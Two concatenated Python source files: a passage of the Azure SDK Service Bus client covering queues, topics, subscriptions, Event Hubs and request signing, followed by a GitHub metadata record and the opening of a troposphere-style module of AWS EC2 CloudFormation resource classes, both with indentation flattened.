Creates a new rule. Once created, this rule's resource manifest is
immutable.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
rule_name:
Name of the rule.
fail_on_exist:
Specify whether to throw an exception when the rule exists.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('rule_name', rule_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + \
'/rules/' + _str(rule_name) + ''
request.body = _get_request_body(_convert_rule_to_xml(rule))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_rule(self, topic_name, subscription_name, rule_name,
fail_not_exist=False):
'''
Deletes an existing rule.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
rule_name:
Name of the rule to delete. DEFAULT_RULE_NAME=$Default.
Use DEFAULT_RULE_NAME to delete default rule for the subscription.
fail_not_exist:
Specify whether throw exception when rule doesn't exist.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('rule_name', rule_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + \
'/rules/' + _str(rule_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_rule(self, topic_name, subscription_name, rule_name):
'''
Retrieves the description for the specified rule.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
rule_name:
Name of the rule.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('rule_name', rule_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + \
'/rules/' + _str(rule_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_rule(response)
def list_rules(self, topic_name, subscription_name):
'''
Retrieves the rules that exist under the specified subscription.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + '/rules/'
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_rule)
def create_subscription(self, topic_name, subscription_name,
subscription=None, fail_on_exist=False):
'''
Creates a new subscription. Once created, this subscription resource
manifest is immutable.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
fail_on_exist:
Specify whether throw exception when subscription exists.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + _str(subscription_name) + ''
request.body = _get_request_body(
_convert_subscription_to_xml(subscription))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_subscription(self, topic_name, subscription_name,
fail_not_exist=False):
'''
Deletes an existing subscription.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription to delete.
fail_not_exist:
Specify whether to throw an exception when the subscription
doesn't exist.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + _str(subscription_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_subscription(self, topic_name, subscription_name):
'''
Gets an existing subscription.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + _str(subscription_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_subscription(response)
def list_subscriptions(self, topic_name):
'''
Retrieves the subscriptions in the specified topic.
topic_name:
Name of the topic.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/'
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_subscription)
def send_topic_message(self, topic_name, message=None):
'''
Enqueues a message into the specified topic. The limit to the number
of messages which may be present in the topic is governed by the
message size in MaxTopicSizeInBytes. If this message causes the topic
to exceed its quota, a quota exceeded error is returned and the
message will be rejected.
topic_name:
Name of the topic.
message:
Message object containing message body and properties.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('message', message)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/messages'
request.headers = message.add_headers(request)
request.body = _get_request_body(message.body)
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def send_topic_message_batch(self, topic_name, messages=None):
'''
Sends a batch of messages into the specified topic. The limit to the number of
messages which may be present in the topic is governed by the message
size the MaxTopicSizeInMegaBytes. If this message will cause the topic
to exceed its quota, a quota exceeded error is returned and the
message will be rejected.
topic_name:
Name of the topic.
messages:
List of message objects containing message body and properties.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('messages', messages)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/messages'
request.headers.append(('Content-Type', 'application/vnd.microsoft.servicebus.json'))
request.body = _get_request_body(json.dumps([m.as_batch_body() for m in messages]))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def peek_lock_subscription_message(self, topic_name, subscription_name,
timeout='60'):
'''
This operation is used to atomically retrieve and lock a message for
processing. The message is guaranteed not to be delivered to other
receivers during the lock duration period specified in buffer
description. Once the lock expires, the message will be available to
other receivers (on the same subscription only) during the lock
duration period specified in the topic description. Once the lock
expires, the message will be available to other receivers. In order to
complete processing of the message, the receiver should issue a delete
command with the lock ID received from this operation. To abandon
processing of the message and unlock it for other receivers, an Unlock
Message command should be issued, or the lock duration period can
expire.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + '/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
def unlock_subscription_message(self, topic_name, subscription_name,
sequence_number, lock_token):
'''
Unlock a message for processing by other receivers on a given
subscription. This operation deletes the lock object, causing the
message to be unlocked. A message must have first been locked by a
receiver before this operation is called.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
sequence_number:
The sequence number of the message to be unlocked as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
'/subscriptions/' + str(subscription_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def renew_lock_subscription_message(self, topic_name, subscription_name,
sequence_number, lock_token):
'''
Renew the lock on an already locked message on a given
subscription. A message must have first been locked by a
receiver before this operation is called.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
sequence_number:
The sequence number of the message to be unlocked as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
'/subscriptions/' + str(subscription_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def read_delete_subscription_message(self, topic_name, subscription_name,
timeout='60'):
'''
Read and delete a message from a subscription as an atomic operation.
This operation should be used when a best-effort guarantee is
sufficient for an application; that is, using this operation it is
possible for messages to be lost if processing fails.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
'/subscriptions/' + _str(subscription_name) + \
'/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
def delete_subscription_message(self, topic_name, subscription_name,
sequence_number, lock_token):
'''
Completes processing on a locked message and delete it from the
subscription. This operation should only be called after processing a
previously locked message is successful to maintain At-Least-Once
delivery assurances.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
sequence_number:
The sequence number of the message to be deleted as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
'/subscriptions/' + _str(subscription_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def send_queue_message(self, queue_name, message=None):
'''
Sends a message into the specified queue. The limit to the number of
messages which may be present in the queue is governed by the message
size the MaxTopicSizeInMegaBytes. If this message will cause the queue
to exceed its quota, a quota exceeded error is returned and the
message will be rejected.
queue_name:
Name of the queue.
message:
Message object containing message body and properties.
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('message', message)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + '/messages'
request.headers = message.add_headers(request)
request.body = _get_request_body(message.body)
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def send_queue_message_batch(self, queue_name, messages=None):
'''
Sends a batch of messages into the specified queue. The limit to the number of
messages which may be present in the topic is governed by the message
size the MaxTopicSizeInMegaBytes. If this message will cause the queue
to exceed its quota, a quota exceeded error is returned and the
message will be rejected.
queue_name:
Name of the queue.
messages:
List of message objects containing message body and properties.
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('messages', messages)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + '/messages'
request.headers.append(('Content-Type', 'application/vnd.microsoft.servicebus.json'))
request.body = _get_request_body(json.dumps([m.as_batch_body() for m in messages]))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def peek_lock_queue_message(self, queue_name, timeout='60'):
'''
Automically retrieves and locks a message from a queue for processing.
The message is guaranteed not to be delivered to other receivers (on
the same subscription only) during the lock duration period specified
in the queue description. Once the lock expires, the message will be
available to other receivers. In order to complete processing of the
message, the receiver should issue a delete command with the lock ID
received from this operation. To abandon processing of the message and
unlock it for other receivers, an Unlock Message command should be
issued, or the lock duration period can expire.
queue_name:
Name of the queue.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + '/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
def unlock_queue_message(self, queue_name, sequence_number, lock_token):
'''
Unlocks a message for processing by other receivers on a given
queue. This operation deletes the lock object, causing the
message to be unlocked. A message must have first been locked by a
receiver before this operation is called.
queue_name:
Name of the queue.
sequence_number:
The sequence number of the message to be unlocked as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def renew_lock_queue_message(self, queue_name, sequence_number, lock_token):
'''
Renew lock on an already locked message on a given
queue. A message must have first been locked by a
receiver before this operation is called.
queue_name:
Name of the queue.
sequence_number:
The sequence number of the message to be unlocked as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def read_delete_queue_message(self, queue_name, timeout='60'):
'''
Reads and deletes a message from a queue as an atomic operation. This
operation should be used when a best-effort guarantee is sufficient
for an application; that is, using this operation it is possible for
messages to be lost if processing fails.
queue_name:
Name of the queue.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + '/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
def delete_queue_message(self, queue_name, sequence_number, lock_token):
'''
Completes processing on a locked message and delete it from the queue.
This operation should only be called after processing a previously
locked message is successful to maintain At-Least-Once delivery
assurances.
queue_name:
Name of the queue.
sequence_number:
The sequence number of the message to be deleted as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def receive_queue_message(self, queue_name, peek_lock=True, timeout=60):
'''
Receive a message from a queue for processing.
queue_name:
Name of the queue.
peek_lock:
Optional. True to retrieve and lock the message. False to read and
delete the message. Default is True (lock).
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
if peek_lock:
return self.peek_lock_queue_message(queue_name, timeout)
else:
return self.read_delete_queue_message(queue_name, timeout)
def receive_subscription_message(self, topic_name, subscription_name,
peek_lock=True, timeout=60):
'''
Receive a message from a subscription for processing.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
peek_lock:
Optional. True to retrieve and lock the message. False to read and
delete the message. Default is True (lock).
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
if peek_lock:
return self.peek_lock_subscription_message(topic_name,
subscription_name,
timeout)
else:
return self.read_delete_subscription_message(topic_name,
subscription_name,
timeout)
def create_event_hub(self, hub_name, hub=None, fail_on_exist=False):
'''
Creates a new Event Hub.
hub_name:
Name of event hub.
hub:
Optional. Event hub properties. Instance of EventHub class.
hub.message_retention_in_days:
Number of days to retain the events for this Event Hub.
hub.status: Status of the Event Hub (enabled or disabled).
hub.user_metadata: User metadata.
hub.partition_count: Number of shards on the Event Hub.
fail_on_exist:
Specify whether to throw an exception when the event hub exists.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(hub_name) + '?api-version=2014-01'
request.body = _get_request_body(_convert_event_hub_to_xml(hub))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def update_event_hub(self, hub_name, hub=None):
'''
Updates an Event Hub.
hub_name:
Name of event hub.
hub:
Optional. Event hub properties. Instance of EventHub class.
hub.message_retention_in_days:
Number of days to retain the events for this Event Hub.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(hub_name) + '?api-version=2014-01'
request.body = _get_request_body(_convert_event_hub_to_xml(hub))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers.append(('If-Match', '*'))
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_event_hub(response)
def delete_event_hub(self, hub_name, fail_not_exist=False):
'''
Deletes an Event Hub. This operation will also remove all associated
state.
hub_name:
Name of the event hub to delete.
fail_not_exist:
Specify whether to throw an exception if the event hub doesn't exist.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(hub_name) + '?api-version=2014-01'
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_event_hub(self, hub_name):
'''
Retrieves an existing event hub.
hub_name:
Name of the event hub.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(hub_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_event_hub(response)
def send_event(self, hub_name, message, device_id=None,
broker_properties=None):
'''
Sends a new message event to an Event Hub.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
if device_id:
request.path = '/{0}/publishers/{1}/messages?api-version=2014-01'.format(hub_name, device_id)
else:
request.path = '/{0}/messages?api-version=2014-01'.format(hub_name)
if broker_properties:
request.headers.append(
('BrokerProperties', str(broker_properties)))
request.body = _get_request_body(message)
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def _get_host(self):
return self.service_namespace + self.host_base
def _perform_request(self, request):
try:
resp = self._filter(request)
except HTTPError as ex:
return _service_bus_error_handler(ex)
return resp
def _update_service_bus_header(self, request):
''' Add additional headers for service bus. '''
if request.method in ['PUT', 'POST', 'MERGE', 'DELETE']:
request.headers.append(('Content-Length', str(len(request.body))))
# if it is not GET or HEAD request, must set content-type.
if not request.method in ['GET', 'HEAD']:
for name, _ in request.headers:
if 'content-type' == name.lower():
break
else:
request.headers.append(
('Content-Type',
'application/atom+xml;type=entry;charset=utf-8'))
# Adds authorization header for authentication.
self.authentication.sign_request(request, self._httpclient)
return request.headers
# Token cache for Authentication
# Shared by the different instances of ServiceBusWrapTokenAuthentication
_tokens = {}
class ServiceBusWrapTokenAuthentication:
def __init__(self, account_key, issuer):
self.account_key = account_key
self.issuer = issuer
def sign_request(self, request, httpclient):
request.headers.append(
('Authorization', self._get_authorization(request, httpclient)))
def _get_authorization(self, request, httpclient):
''' return the signed string with token. '''
return 'WRAP access_token="' + \
self._get_token(request.host, request.path, httpclient) + '"'
def _token_is_expired(self, token):
''' Check if token expires or not. '''
time_pos_begin = token.find('ExpiresOn=') + len('ExpiresOn=')
time_pos_end = token.find('&', time_pos_begin)
token_expire_time = int(token[time_pos_begin:time_pos_end])
time_now = time.mktime(time.localtime())
# Adding 30 seconds so the token wouldn't be expired when we send the
# token to server.
return (token_expire_time - time_now) < 30
def _get_token(self, host, path, httpclient):
'''
Returns token for the request.
host:
the service bus service request.
path:
the service bus service request.
'''
wrap_scope = 'http://' + host + path + self.issuer + self.account_key
# Check whether has unexpired cache, return cached token if it is still
# usable.
if wrap_scope in _tokens:
token = _tokens[wrap_scope]
if not self._token_is_expired(token):
return token
# get token from accessconstrol server
request = HTTPRequest()
request.protocol_override = 'https'
request.host = host.replace('.servicebus.', '-sb.accesscontrol.')
request.method = 'POST'
request.path = '/WRAPv0.9'
request.body = ('wrap_name=' + url_quote(self.issuer) +
'&wrap_password=' + url_quote(self.account_key) +
'&wrap_scope=' +
url_quote('http://' + host + path)).encode('utf-8')
request.headers.append(('Content-Length', str(len(request.body))))
resp = httpclient.perform_request(request)
token = resp.body.decode('utf-8-sig')
token = url_unquote(token[token.find('=') + 1:token.rfind('&')])
_tokens[wrap_scope] = token
return token
class ServiceBusSASAuthentication:
def __init__(self, key_name, key_value):
self.key_name = key_name
self.key_value = key_value
def sign_request(self, request, httpclient):
request.headers.append(
('Authorization', self._get_authorization(request, httpclient)))
def _get_authorization(self, request, httpclient):
uri = httpclient.get_uri(request)
uri = url_quote(uri, '').lower()
expiry = str(self._get_expiry())
to_sign = uri + '\n' + expiry
signature = url_quote(_sign_string(self.key_value, to_sign, False), '')
auth_format = 'SharedAccessSignature sig={0}&se={1}&skn={2}&sr={3}'
auth = auth_format.format(signature, expiry, self.key_name, uri)
return auth
def _get_expiry(self):
'''Returns the UTC datetime, in seconds since Epoch, when this signed
request expires (5 minutes from now).'''
return int(round(time.time() + 300))
|
{
"content_hash": "ecb2dc4e23e7bb15227774180d2278a6",
"timestamp": "",
"source": "github",
"line_count": 1349,
"max_line_length": 106,
"avg_line_length": 40.223128243143066,
"alnum_prop": 0.6013895799929968,
"repo_name": "SUSE/azure-sdk-for-python",
"id": "83dd5e85c09d35486b40483990b3f98150d5532e",
"size": "54263",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "azure-servicebus/azure/servicebus/servicebusservice.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9090161"
}
],
"symlink_target": ""
}
|
from . import AWSHelperFn, AWSObject, AWSProperty
from .validators import (
boolean, exactly_one, integer, integer_range,
network_port, positive_integer
)
try:
from awacs.aws import Policy
policytypes = (dict, Policy)
except ImportError:
policytypes = dict,
class Tag(AWSProperty):
props = {
'Key': (basestring, True),
'Value': (basestring, True)
}
def __init__(self, key=None, value=None, **kwargs):
# provided for backward compatibility
if key is not None:
kwargs['Key'] = key
if value is not None:
kwargs['Value'] = value
super(Tag, self).__init__(**kwargs)
class CustomerGateway(AWSObject):
resource_type = "AWS::EC2::CustomerGateway"
props = {
'BgpAsn': (integer, True),
'IpAddress': (basestring, True),
'Tags': (list, False),
'Type': (basestring, True),
}
class DHCPOptions(AWSObject):
resource_type = "AWS::EC2::DHCPOptions"
props = {
'DomainName': (basestring, False),
'DomainNameServers': (list, False),
'NetbiosNameServers': (list, False),
'NetbiosNodeType': (integer, False),
'NtpServers': (list, False),
'Tags': (list, False),
}
class EgressOnlyInternetGateway(AWSObject):
resource_type = "AWS::EC2::EgressOnlyInternetGateway"
props = {
'VpcId': (basestring, True),
}
class EIP(AWSObject):
resource_type = "AWS::EC2::EIP"
props = {
'InstanceId': (basestring, False),
'Domain': (basestring, False),
}
class EIPAssociation(AWSObject):
resource_type = "AWS::EC2::EIPAssociation"
props = {
'AllocationId': (basestring, False),
'EIP': (basestring, False),
'InstanceId': (basestring, False),
'NetworkInterfaceId': (basestring, False),
'PrivateIpAddress': (basestring, False),
}
class FlowLog(AWSObject):
resource_type = "AWS::EC2::FlowLog"
props = {
'DeliverLogsPermissionArn': (basestring, True),
'LogGroupName': (basestring, True),
'ResourceId': (basestring, True),
'ResourceType': (basestring, True),
'TrafficType': (basestring, True),
}
class NatGateway(AWSObject):
resource_type = "AWS::EC2::NatGateway"
props = {
'AllocationId': (basestring, True),
'SubnetId': (basestring, True),
}
class EBSBlockDevice(AWSProperty):
props = {
'DeleteOnTermination': (boolean, False),
'Encrypted': (boolean, False),
'Iops': (integer, False), # Conditional
'SnapshotId': (basestring, False), # Conditional
'VolumeSize': (integer, False), # Conditional
'VolumeType': (basestring, False),
}
class BlockDeviceMapping(AWSProperty):
props = {
'DeviceName': (basestring, True),
'Ebs': (EBSBlockDevice, False), # Conditional
'NoDevice': (dict, False),
'VirtualName': (basestring, False), # Conditional
}
class MountPoint(AWSProperty):
props = {
'Device': (basestring, True),
'VolumeId': (basestring, True),
}
class Placement(AWSProperty):
props = {
'AvailabilityZone': (basestring, False),
'GroupName': (basestring, False),
}
class Ipv6Addresses(AWSHelperFn):
def __init__(self, address):
self.data = {
'Ipv6Address': address,
}
class PrivateIpAddressSpecification(AWSProperty):
props = {
'Primary': (boolean, True),
'PrivateIpAddress': (basestring, True),
}
class NetworkInterfaceProperty(AWSProperty):
props = {
'AssociatePublicIpAddress': (boolean, False),
'DeleteOnTermination': (boolean, False),
'Description': (basestring, False),
'DeviceIndex': (integer, True),
'GroupSet': ([basestring], False),
'NetworkInterfaceId': (basestring, False),
'Ipv6AddressCount': (integer, False),
'Ipv6Addresses': ([Ipv6Addresses], False),
'PrivateIpAddress': (basestring, False),
'PrivateIpAddresses': ([PrivateIpAddressSpecification], False),
'SecondaryPrivateIpAddressCount': (integer, False),
'SubnetId': (basestring, False),
}
class AssociationParameters(AWSProperty):
props = {
'Key': (basestring, True),
'Value': ([basestring], True),
}
class SsmAssociations(AWSProperty):
props = {
'AssociationParameters': ([AssociationParameters], False),
'DocumentName': (basestring, True),
}
class Host(AWSObject):
resource_type = "AWS::EC2::Host"
props = {
'AutoPlacement': (basestring, False),
'AvailabilityZone': (basestring, True),
'InstanceType': (basestring, True),
}
class Instance(AWSObject):
resource_type = "AWS::EC2::Instance"
props = {
'Affinity': (basestring, False),
'AvailabilityZone': (basestring, False),
'BlockDeviceMappings': (list, False),
'DisableApiTermination': (boolean, False),
'EbsOptimized': (boolean, False),
'HostId': (basestring, False),
'IamInstanceProfile': (basestring, False),
'ImageId': (basestring, True),
'InstanceInitiatedShutdownBehavior': (basestring, False),
'InstanceType': (basestring, False),
'Ipv6AddressCount': (integer, False),
'Ipv6Addresses': ([Ipv6Addresses], False),
'KernelId': (basestring, False),
'KeyName': (basestring, False),
'Monitoring': (boolean, False),
'NetworkInterfaces': ([NetworkInterfaceProperty], False),
'PlacementGroupName': (basestring, False),
'PrivateIpAddress': (basestring, False),
'RamdiskId': (basestring, False),
'SecurityGroupIds': (list, False),
'SecurityGroups': (list, False),
'SsmAssociations': ([SsmAssociations], False),
'SourceDestCheck': (boolean, False),
'SubnetId': (basestring, False),
'Tags': (list, False),
'Tenancy': (basestring, False),
'UserData': (basestring, False),
'Volumes': (list, False),
}
class InternetGateway(AWSObject):
resource_type = "AWS::EC2::InternetGateway"
props = {
'Tags': (list, False),
}
class NetworkAcl(AWSObject):
resource_type = "AWS::EC2::NetworkAcl"
props = {
'Tags': (list, False),
'VpcId': (basestring, True),
}
class ICMP(AWSProperty):
props = {
'Code': (integer, False),
'Type': (integer, False),
}
class PortRange(AWSProperty):
props = {
'From': (network_port, False),
'To': (network_port, False),
}
class NetworkAclEntry(AWSObject):
resource_type = "AWS::EC2::NetworkAclEntry"
props = {
'CidrBlock': (basestring, False),
'Egress': (boolean, False),
'Icmp': (ICMP, False), # Conditional
'Ipv6CidrBlock': (basestring, False),
'NetworkAclId': (basestring, True),
'PortRange': (PortRange, False), # Conditional
'Protocol': (network_port, True),
'RuleAction': (basestring, True),
'RuleNumber': (integer_range(1, 32766), True),
}
def validate(self):
conds = [
'CidrBlock',
'Ipv6CidrBlock',
]
exactly_one(self.__class__.__name__, self.properties, conds)
class NetworkInterface(AWSObject):
resource_type = "AWS::EC2::NetworkInterface"
props = {
